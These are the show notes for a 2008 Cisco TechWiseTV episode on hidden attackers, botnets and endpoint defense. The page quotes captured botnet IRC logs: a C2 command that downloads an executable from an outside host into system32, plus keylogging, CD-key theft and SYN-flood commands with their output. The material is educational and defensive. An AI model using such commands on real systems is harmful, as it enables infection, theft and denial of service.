27 Invisible Attackers

TechWise TV episode 27
Invisible Attackers: Stop the Bot
Show Notes
Air Date: January 10, 2008 Watch the Replay

Synopsis
Segment 1 – Hiding in Plain Site
Segment 2 – Understanding the Botnet Threat
Segment 3 – Endpoint Enforcement with CSA

Links:
Control Security Threats
cisco.com/go/csa
CSA Flash Demo

Get a look at the Q&A from the live show...attached at the bottom of this page.

Synopsis
It is often what we don’t know that can hurt us the most. Security challenges continue to evolve as everyone gets smarter and the stakes get that much higher. Security is like a chess match where every move provokes a counter move and as we have gotten more intelligent with our defenses, malicious attackers have continued to evolve as well. Now that the focus has shifted from fame to fortune, today’s attacker finds it most advantageous to remain ‘low on the radar’ if not completely invisible. Today’s malicious hacker follows a straightforward credo: “The less you know about my tools and methods the longer the shelf life and the greater my haul.”

In typical TechWiseTV fashion we pull back the curtain to reveal how today’s smart attacker is using common tools and old-fashioned smarts to accomplish lucrative new goals with YOUR network and YOUR systems.
We promise new insights into 7 critical areas:
1. How attackers are hiding in plain sight and what you can do to ‘flush them out’.
2. How attackers are using normal system features to perform abnormal and malicious acts.
3. 6 simple things you can do today to severely limit someone’s ability to cover their tracks.
4. The incredible rise of the botnet, evolution of their malicious code, and why the economics make so much sense.
5. The feedback loop that perpetuates spam, worms and botnets and how to avoid becoming an enabler.
6. How attackers are using indirection to communicate freely in and out of your network.
7. Where you can start construction on a dynamic and intelligent defense plan from the inside out.

It’s episode 27 of TechWiseTV: Technology you can use from geeks you can trust

Funny sometimes how things tend to take on a life of their own. This show was an idea Robb and I had for a podcast. As we were working out the details, Robb come to the realization, that we had a TechWise show on our hands. That is the relationship Robb and I have. I am a geek. I can tell disjointed fishing hole stories all day long. Robb is a visionary. He listens and puts together an vision and action plan out of this stuff and a show is born. Amazing really. This is really how BotMasters work also. (Sorry Robb…) They take they disjointed fabric of the Internet, weave a business plan into it and before you know it, a new idea is born out of the thoughts of many.

Segment 1: Hiding in Plain Site
Ever go up to someone wearing camo and say something dumb like, “I can’t see you” I got punched in the head one time for that. (I didn’t know Robb was so sensitive about his wardrobe…) I have been to many hacker conventions and it is easy to spot the noobs, because they tend to brute force their way into systems. Being noisy on the wire and breaking many file dependencies to install their own crapware. This type of behavior is great to doing firewall/IDS demos and Hollywood but with respect to them, in a demo or movie time is our enemy so we have to get to the point. But please do not confuse demos-movies with reality.Time is on the side of the hacker/bothearder. To keep that advantage, that have to hide in plain site. Of course encryption is what many folks drift to, truthfully, I prefer my bothearders to encrypt data. I can spot encrypted traffic easily on my network and react to it fast. The scary stuff is hiding files with ADS (Alternative Data Streams) and then calling those files with HTTP. Microsoft has a free tool called STREAMS that you can download and check for these streamed files.

Screenshot of the file we streamed on set and how the Streams utility caught it:

The trick is make sure you specify the search path or it will not work. Of course we also have Covert Channels that are also a threat. These started with a simple ICMP tool called LOKI and they have improved many times over since then. Now CC (as they are called in cool circles; like the 501st Stormtrooper meetings…) now use HTTP, TCP, ICMP as transports to funnel information back and forth. Remember bots are dumb and they need to send information back and forth to work. One of the hiding in plain site methods we did not discuss was Steganography. This is kinda like streaming a file behind another file. Folks are using this “watermarking” process to hide MP3’s and porn behind legitimate pictures. Check out the difference between these two files:

Normal Picture	Carrier Picture with hidden .txt file

Amazing stuff isn’t it! This such a awesome field to be working in!! (If you can decode this, it has Robb’s Christmas list and home phone number….use the discussion thread below if you think you figured it out).

Segment 2: Understanding the Botnet Threat

It is tough to understand the real threat without REALLY understanding the way. Robb said it best on the show; “Why do folks rob banks? Because that is where the money is” I use that analogy when I give a presentation on hacking network switches. Why hack a switch? Because that is where the data is. Botnets are for plain old money. Money is the motivation and a botmaster will do anything in their power to stay hidden to keep that 67 billion dollar money stream flowing. To understand the threat; lets get some terms straight first:

Virus: is NOT a bot. A virus is normally self propagating and needs no central command to tell it what to do. It is programmed for a course of action. Kinda like The Terminator, “Hasta La Vista HOSTS file….”

Bot: is NOT a virus. A bot is a very small piece of modular code that must be controlled somewhere be someone. Since the code is modular, a bot herder can add and remove functionality as needed. Very well coded and normally can not be detected by drops in system performance.

Hacker: Without getting into the, a hacker used to be this or that, or the color headware… A hacker normally breaks into a system for the purpose of controlling (or owning (hacker speak: 0wn3d) a system. Sometimes for fun, education or meanness but normally they want total control of your network.

BotNet: Collection of bots controlled by a bot herder to form a network a pain for all of us. This is usually in the thousands of bots all over the world.

Bot Herder: These folks control a large number of systems (mainly PC’s) via a bot. They normally have very poor coding skills and are using the modularity of bots to design there own creation. Here is a GUI for making your own bots from the Agobot base code:
ago

How easy is that! A bot herder is NOT a hacker. Bot herders control botnets. Here is a sample of a botnet controller I took right off on my own darknet:

IRC Channel Join

-> PASS D3&hh*
-> USER CC-5644 * 0 :IMP1
-> NICK [T11|USA|51932]
<- :sv2.bothost.net 001 [T11|USA|51932] :
<- :sv2.bothost.net 002 [T11|USA|51932] :
<- :sv2.bothost.net 003 [T11|USA|51932] :
-> JOIN ##tshuab l3a9
<- :sv2.bothost.net 442 [T11|USA|51932] ##tshaub l3a9
<- :sv2.bothost.net 443 [T11|USA|51932] ##tshaub 6h057
<- :sv2.bothost.net NOTICE [T11|USA|51932] :*** You were forced to join ##gt
<- :sv2.bothost.net 442 [T11|USA|51932] ##gt : .get http://www.net.nu/tort.exe C:\WINDOWS\system32\tdmk.exe r h

Bot Creator: These folks are super good code jockeys. They think outside of the box and really can do a whole lot with very little. They actually design the original bot (base bot). They are rarely caught or known.

Spyware: Typically is not a bot per se, in that they do not have a central command and control. Spyware gathers info and reports back. Normally very poorly coded and can be detected by watching system performance drop.

In the wild, there are only about 10-20 actual base bots. Those bots have names like; AgoBot, XTbot, SDbot, Storm, Dataspy Network X, etc… However, out of those 10-20 base bots over 8000 variants exist. For example, AgoBot has over 1500 variants alone. Those are called; Goabot, Phatbot, Forbot, XtrmBot and a few others. AgoBot itself is very easy to build a custom bot for because it has a GUI configuration interface that allows someone with zero coding skills to build and deploy their own custom bot.

What do bots actually do? Many folks believe bots are more a necessary evil we have to put up with in networking and just look the other way. This is more true in the enterprise then in the home market actually, as odd as that sounds. Bots can do the following:

- Keylogging (looks like this to the bot from the controller)

<@controller>.keylog on
<+[HKL]94877> [KEYLOG]: (changed Windows: AIM)
<+[HKL]94877> [KEYLOG]:hey Dude!(Return) (changed Windows: Robb )
<+[HKL]94877> [KEYLOG]: (changed Windows: Google -Microsoft IE 6)
<+[HKL]94877> [KEYLOG]:fishing season(Return) (Microsoft IE)

- Getting CD Keys from installed software (looks like this to the bot from the controller)

<@controller>.getcdkeys
<+[JPN]12990> Microsoft Windows Product ID CD Key: xxxxxxxxx
<+[JPN]12990> Half Life (Blue Shift) Product CD Key: xxxxxxx
<+[JPN]12990> [CDKEYS] Search Completed

- DDOS Attacks (looks like this to the bot from the controller)
:NEX-7760!.ddos.syn 205.88.xxx.xxx 80 500
USA|387166 ##Lezone## :s[I] (ddos.plg) Done with flood (1525KB/sec).
CAN|112908 ##Lezone## :s[I] (ddos.plg) Done with flood (1080KB/sec).
JPN|286741 ##Lezone## :s[I] (ddos.plg) Done with flood (488KB/sec).
TWN|128976 ##Lezone## :s[I] (ddos.plg) Done with flood (1855KB/sec).
CHN|765512 ##Lezone## :s[I] (ddos.plg) Done with flood (1211KB/sec).
* notice that the bot reports back the bandwidth actually used!*

Plus bots can also be used for SPAM, Adware installation, Asset tracking, Poll and ad manipulation

These missions can be added and changed on the fly. The question is why right? Follow the money…Bots are BIG business. Spammers can make up to $750K per year with bots. They are not zit faced, pizza eating punk kids just trying to be mean. Bot herders are in it for the money. 100% of the time that I have tracked bots there is ALWAYS a criminal element behind it. Please understand, bots are not innocent fun little experiments. This is big opportunity to make some serious cash. This is the single biggest reason that bots are coded so well. If you can detect and remove them, the bot herder has lost money. Bot herders keep good records and can add and remove modules to appeal to their customer base. Consider a bot on any of your machines has a “For Rent Will Customize to Suit Need” sign on it.
drones

Thank you to the fine folks at www.shadowserver.org for this graphic and the excellent resources

Bots are kinda like seeing your in-laws pull up in your driveway. If you are not proactive in monitoring it is too late once they are there. Protecting you network NOW is the key to preventing your data/resources from being used-traded on the dark market.

Segment 3: Endpoint Enforcement

Where does data reside and the potential for damage remain the greatest? The endpoint of course. John Eppich from the Cisco Security Agent Business Unit discusses the tactics used and the defenses you can employ to protect your most valuable assets today.

Cisco Security Agent uses correlation within rules to prevent zero-day (unknown) attacks, as well as known attacks . Being able to tag something as a network application when it touches the network, and applying preventive rules to protect against malicious behavior, is one of many adaptive ways that CSA is able to protect your systems. As an example, Bots may target a system via IRC in a controlled manner, or P2P in an uncontrolled manner. The moment an application touches the network, these zero-day, zero-update policies will protect the system from malicious action, CSA does not care if about the origin of the attack (IRC, PTP or HTTP).

Bots can also spread and infect other systems by launching a series of exploits targeting the operating system or an application’s vulnerabilities. The concept of correlation comes into play via default preventative rules whereby CSA can recognize and stop for example, a remote process that attempts to execute code or perhaps steal information.

The ability to recognize and stop the automatic installation of software can be one of CSA’s most powerful strengths. CSA will prompt the user at any attempt like this so that nothing invisible can be installed in the background (such as often happens with malware) and any corporate policies on such activities can be easily monitored and regulated down to a per user level.

Beyond Zero-Day, and Zero Update Policies, CSA has other pre-built Acceptable Usage Policies to protect your most valuable assets. One such policy is a Data Theft Policy which allows you to define ‘sensitive data’ and protect from a variety of risks such as clipboard abuse (cut & paste between applications), unauthorized applications attempting to interact with this data, as well as other potential exit points.

CSA can also establish control and oversight in a number of other areas as well:

- Regulatory Compliance: Assign a PCI Compliance Policy to a sgroup protecting cardholder data for example.

- Data Center Security: deploy security patches on your own schedule rather than your software vendors. CSA’s behavioral protection has historically provided protection against every new vulnerability and threat without updates. This can take you far in maintaining sanity with database, application and other critical servers.
- IP Telephony Security: a headless (no management) version of CSA already comes pre-installed on almost all of Cisco’s call management and processing servers. These can be easily upgraded into managed units for increasing overall visibility and correlation with the rest of your CSA installed base.